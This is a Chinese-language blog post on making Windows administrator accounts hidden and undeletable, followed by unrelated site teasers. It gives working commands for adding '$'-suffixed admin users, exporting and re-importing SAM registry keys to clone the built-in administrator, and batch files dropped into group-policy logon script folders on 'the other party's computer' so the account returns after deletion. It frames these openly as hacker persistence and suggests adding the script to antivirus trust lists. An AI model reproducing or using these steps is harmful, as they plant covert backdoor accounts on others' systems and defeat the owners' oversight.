Windows超级隐藏用户(实际局部隐藏)

实际操作:

(hklm\sam\sam文件夹默认system权限打开,如果以管理员身份操作,
需更改注册表 hklm\sam\sam文件夹的权限为administrators完全更改权限)
net user admin_user$ 123456 /add
net localgroup administrators admin_user$ /add
regedit /e c:\user$.reg hkey_local_machine\sam\sam\domains\account\users\names\admin_user$
regedit /e c:\3eb.reg hkey_local_machine\sam\sam\domains\account\users\000003EB
regedit /e c:\1f4.reg hkey_local_machine\sam\sam\domains\account\users\000001F4
type c:\1.reg     #等于Linux的cat命令
编辑1f4.reg,将其中的"F"=...把3eb.reg中对应部分替换
net user "admin user$" /del
regedit /s c:\1f4.reg
regedit /s c:\user$.reg
(现在可以用admin_user$登陆Windows了)#管理员权限,而且没有用户家目录
whoami /user   #查看本用户UID

链接:用批处理建立隐藏超级管理员账户

内容:@echo off
  net user admin123 /add & net localgroup administrators admin /add
  这段命令相信大家都很熟悉了,“net user admin123 /add”用与建立一个帐户名为admin密码为:123的帐户
  “net localgroup administrators admin/add”用于把帐户admin加入管理员组。
  regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
  上面的命令的作用是导出“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”键值并存为C:\1.reg
  net user admin/del   此命令作用是删除帐户admin
  regedit /s c:\1.reg
  导入1.reg
  完成,把上面几段命令复制到文本文档,然后另存为任意文件名的bat文件运行即可。
  (注:此方法建立的隐藏帐户,控制面板--用户内不会显示。计算机管理---用户和组里面也不会显示,DOS下无法删除,只有到“注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下删除对应键值方可删除帐户)

但是,在重启电脑后,此方法隐藏的admin$ 用户名也会出现在计算机管理->用户和组->用户列表项中,也无法逃脱被发现的厄运(就黑客来说)。


我想一个黑客要不被发现,需要这样做:

在组策略设置开机时脚本:按下述方法添加隐藏用户(确保新建user$后已net user /del);

regedit /s c:\1f4.reg
regedit /s c:\user$.reg

和关机时脚本:删除此隐藏账户。
问题是:需要改这个东西(hklm\sam\sam文件夹默认system权限打开,如果以管理员身份操作,
需更改注册表 hklm\sam\sam文件夹的权限为administrators完全更改权限)这样容易被有经验的管理员发现,而且如何隐藏脚本也是关键(可以在杀毒软件上添加信任)。


我的想法实践只成功了一半,计算机管理->用户和组->用户列表项中仍出现了该隐藏用户。

实测结果:开机脚本可以实现登录任意用户后均能添加管理员用户,不过会出现开机时有“运行脚本”的字样,一闪而过。
用户登录脚本发现只有管理员组及以上权限才可以添加管理员账户,未发现登录时有“运行脚本”字样,regedit 保存执行成功。
PS:开机脚本因为未将注册表路径设置正确,导致失败,我想注册表路径设置正确,也会成功,因为在注册表路径正确的情况下,登录脚本regedit 保存操作成功执行。


--------------------------------------------------------------------------------------------------------------

建立系统中别人永远删不掉的管理员用户只需做个小小的批处理
  操作步骤:
  1、在自己电脑里面建立一个.txt文本文件.
  2、在里面输入内容
  @echo off
  net user hacker57 123456 /add 注释:前面hacker57是用户名后面123456是密码;
  net localgroup administrators hacker57 /add
  3、把这个文件保存,更改后缀为hacker57.bat 注释:前面名字随便,后面格式一定要是bat;
  4、把这个文件拷贝到对方电脑C:\windows\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。

此目录是组策略》》Windows设置》脚本(登录)的地方

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
  如果把里面的内容改成
  @echo off
  net user administrator 123456 /add
  意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456

参考链接:1、建立隐藏的超级用户---由《建立隐藏的超级用户》一文引出之“骗局”
2、 建立超级隐藏用户账户
3、WIN7系统设置隐藏用户
4、用批处理建立隐藏超级管理员账户

net user "admin user$" 123456 /add
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,558评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,002评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,036评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,024评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,144评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,255评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,295评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,068评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,478评论 1 305
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,789评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,965评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,649评论 4 336
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,267评论 3 318
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,982评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,223评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,800评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,847评论 2 351

推荐阅读更多精彩内容

  • 这篇文章几乎几乎原封不动的搬过来了这位博主的内容,作为自己以后查询方便用~ reference:http://bl...
    DeamoV阅读 20,269评论 3 33
  • 工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3...
    Safesonic阅读 6,235评论 0 4
  • 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3....
    钦玄阅读 1,228评论 0 5
  • 下班、聊天、不开心、练瑜伽、跑步、洗漱、打开小米音箱放歌、准备看书。中间穿插多次看手机,隐隐有些期待的信息并没有。...
    金先锋阅读 229评论 0 0
  • 我以为你是天空中的月亮 前路泥泞艰险 无论看不看得见 你将始终在我身后 不离不弃 无言的陪伴是我最后的港湾 天与地...
    蔚昕阅读 289评论 1 2